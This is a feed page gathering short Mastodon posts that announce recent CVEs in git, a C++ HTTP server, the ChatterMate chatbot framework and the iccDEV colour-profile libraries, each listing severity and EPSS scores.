linux@activitypub.awakari.com at 2026-01-23T21:15:44.000Z ## Future-Proof Your Ubuntu: Mastering Backporting to Bypass Package Obsolescence Key Points A high vulnerability (CVE-2025-48384) was discovered in git, allowing arbitrary code execution when cloning...

#Ubuntu #News

Origin | Interest | Match ##

CVE-2026-24469
(0 None)

EPSS: 0.03%

1 posts

N/A

thehackerwire@mastodon.social at 2026-01-24T03:59:54.000Z ##

🟠 CVE-2026-24469 - High (7.5)

C++ HTTP Server is an HTTP/1.1 server built to handle client connections and serve HTTP requests. Versions 1.0 and below are vulnerable to Path Traversal via the RequestHandler::handleRequest method. This flaw allows an unauthenticated, remote att...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24399
(0 None)

EPSS: 0.01%

2 posts

N/A

thehackerwire@mastodon.social at 2026-01-24T01:34:09.000Z ##

πŸ”΄ CVE-2026-24399 - Critical (9.3)

ChatterMate is a no-code AI chatbot agent framework. In versions 1.0.8 and below, the chatbot accepts and executes malicious HTML/JavaScript payloads when supplied as chat input. Specifically, an payload containing a javascript: URI can be proces...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-24T01:20:46.000Z ##

πŸ”΄ CVE-2026-24399 - Critical (9.3)

ChatterMate is a no-code AI chatbot agent framework. In versions 1.0.8 and below, the chatbot accepts and executes malicious HTML/JavaScript payloads when supplied as chat input. Specifically, an payload containing a javascript: URI can be proces...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24406
(0 None)

EPSS: 0.06%

2 posts

N/A

thehackerwire@mastodon.social at 2026-01-24T01:33:59.000Z ##

🟠 CVE-2026-24406 - High (8.8)

iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccTagNamedColor2::SetSize(). This occurs when user-contro...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-24T01:20:39.000Z ##

🟠 CVE-2026-24406 - High (8.8)

iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccTagNamedColor2::SetSize(). This occurs when user-contro...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24405
(0 None)

EPSS: 0.06%

1 posts

N/A

thehackerwire@mastodon.social at 2026-01-24T01:20:49.000Z ##

🟠 CVE-2026-24405 - High (8.8)

iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have a Heap Buffer Overflow vulnerability in CIccMpeCalculator::Read(). This occurs when user-controllab...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

Visit counter For Websites